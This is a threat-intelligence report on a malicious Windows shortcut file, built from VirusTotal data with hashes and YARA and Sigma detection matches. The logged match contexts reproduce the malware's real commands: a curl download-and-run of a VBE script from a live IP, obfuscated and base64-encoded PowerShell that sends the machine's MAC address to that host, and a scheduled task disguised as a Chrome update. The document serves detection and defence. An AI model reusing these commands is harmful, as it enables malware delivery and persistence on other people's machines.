b3c90f52e4b86a94ec637fee4354bb84
Hash
- MD5: b3c90f52e4b86a94ec637fee4354bb84
- SHA1: 95cc996705f5fb8d7947615269101fb4621306d9
- SHA256: 169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f
- First Seen: 2026-05-15
- Last Seen: 2026-05-15
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f"
},
"attributes": {
"creation_date": 1620461640,
"magic": "MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat May 8 08:14:00 2021, mtime=Sat May 8 08:14:00 2021, atime=Sat May 8 08:14:00 2021, length=250880, window=hide",
"type_tags": [
"windows",
"lnk"
],
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Archive_in_LNK",
"match_date": 1779792619,
"description": "Identifies archive (compressed) files in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Execution_in_LNK",
"match_date": 1779792619,
"description": "Identifies execution artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PDF_in_LNK",
"match_date": 1779792619,
"description": "Identifies Adobe Acrobat artefacts in shortcut (LNK) files. A PDF document is typically used as decoy in a malicious LNK.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
}
],
"sigma_analysis_results": [
{
"rule_level": "critical",
"rule_id": "317ff64a1d49452191210f7b55d7201e483352440ec851a9c716f6be7cfb7ec9",
"rule_source": "Joe Security Rule Set (GitHub)",
"rule_title": "Powershell Download and Execute IEX",
"rule_description": "powershell download file from internet and execute",
"rule_author": "Joe Security",
"match_context": [
{
"values": {
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "09a6527b05920e47aecbebf5df306d1c194b850076e73d74c3b9ead23b654425",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Encoded PowerShell Command Line",
"rule_description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)",
"rule_author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "12273189dbbd1ed526c045fb9a7d5e45682ba4e0a13e2e94d65376962a0bfc2e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Encoded Command Patterns",
"rule_description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "209da224f420ee601f12f3cc1d00c8e1858190da8d89c39cba703253ef1c02e0",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Binaries and Scripts in Public Folder",
"rule_description": "Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.",
"rule_author": "The DFIR Report",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Public\\Music\\ant.vbe"
}
}
]
},
{
"rule_level": "high",
"rule_id": "78dc71a5599dc85b3d37a6ab0f014aa5110b2ce1b2346c8f2730e0c481977781",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Curl Download And Execute Combination",
"rule_description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.",
"rule_author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=E563BAE25E3C011A1E69B4636C9B29B5661C460A,MD5=89B5A70BF37A93015F4845BF901B7825,SHA256=678652BB50ABB92DE91A69C05EA018C160FB4BE0902ACE14B15749246788CB40,IMPHASH=FD97AFEC4DC549DCD1FE1DAD15035DF9",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "80bbf1ed6106205ab2926430c9634286f976b2fee4357dbacddec45b979a4422",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Windows Shell/Scripting Processes Spawning Suspicious Programs",
"rule_description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.",
"rule_author": "Florian Roth (Nextron Systems), Tim Shelton",
"match_context": [
{
"values": {
"Hashes": "MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "schtasks.exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Task Scheduler Configuration Tool",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\schtasks.exe\" /create /TN Chrome_Update /TR \"C:\\Windows\\System32\\wscript.exe /b \"C:\\users\\public\\music\\ant.vbe\"\" /SC MINUTE /mo 15 /f",
"FileVersion": "10.0.19041.906 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\schtasks.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "92acfd50d9fe4d995d6998a5346e4e031ea037d422458bb4f74555a52ffc886c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Script Interpreter Execution From Suspicious Folder",
"rule_description": "Detects a suspicious script execution in temporary folders or folders accessible by environment variables",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=5F16CD5E2E335F539B07408269747B513169667F,MD5=D087E242B4B46BB9AA3EFF21A39539E5,SHA256=798D264624C42BD064F7594B1CCED7B0C9E4E607F285C4107D05D718EC0EB2E7,IMPHASH=EF531128187546B7A99ADE5BF64547B4",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "wscript.exe",
"Product": "Microsoft \\xae Windows Script Host",
"Description": "Microsoft \\xae Windows Based Script Host",
"FileVersion": "5.812.10240.16384",
"ParentCommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"CommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\users\\public\\music\\ant.vbe\" ",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "c6cac3013982f7f078cbf7fdc49b83f80fe4377b7ba4434f2533c34c98a85608",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Command Patterns In Scheduled Task Creation",
"rule_description": "Detects scheduled task creation using \"schtasks\" that contain potentially suspicious or uncommon commands",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "schtasks.exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Task Scheduler Configuration Tool",
"FileVersion": "10.0.19041.906 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\schtasks.exe\" /create /TN Chrome_Update /TR \"C:\\Windows\\System32\\wscript.exe /b \"C:\\users\\public\\music\\ant.vbe\"\" /SC MINUTE /mo 15 /f",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\schtasks.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "d86dfee683d0e96803dc8a153d15f7208afc774045e2d885ccaec10bdcef7831",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Curl.EXE Download",
"rule_description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=59E081BED369AC6034F628C64B8A73531BEDB6E2,MD5=DBD30D70FCDAE1FD343DDAD5C55C4E78,SHA256=E6F66D659242AA7D6DD3C1967714C6CD3E0B11AAA235E7F7A150A3316DAE8E61,IMPHASH=66E86C833873DBB82BDB3D7F9BBE6DC9",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"CommandLine": "curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe ",
"FileVersion": "8.0.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.se/"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "0533322c5c44794b71e761cd351a2459aad6e21ae95c9543d4c9fdb3c8fde6c4",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE",
"rule_description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "schtasks.exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Task Scheduler Configuration Tool",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\schtasks.exe\" /create /TN Chrome_Update /TR \"C:\\Windows\\System32\\wscript.exe /b \"C:\\users\\public\\music\\ant.vbe\"\" /SC MINUTE /mo 15 /f",
"FileVersion": "10.0.19041.906 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\schtasks.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "1429a6819ff25aad68fb09601fb0b63c4be24919adfd25c4ad925ef8d47d8f22",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "WmiPrvSE Spawned A Process",
"rule_description": "Detects WmiPrvSE spawning a process",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g",
"match_context": [
{
"values": {
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "1ca8739651295d88708cb5ddfb7a115ae0d202152a80ee4c7871e62f3509c938",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell",
"rule_description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.",
"rule_author": "Markus Neis @Karneades",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
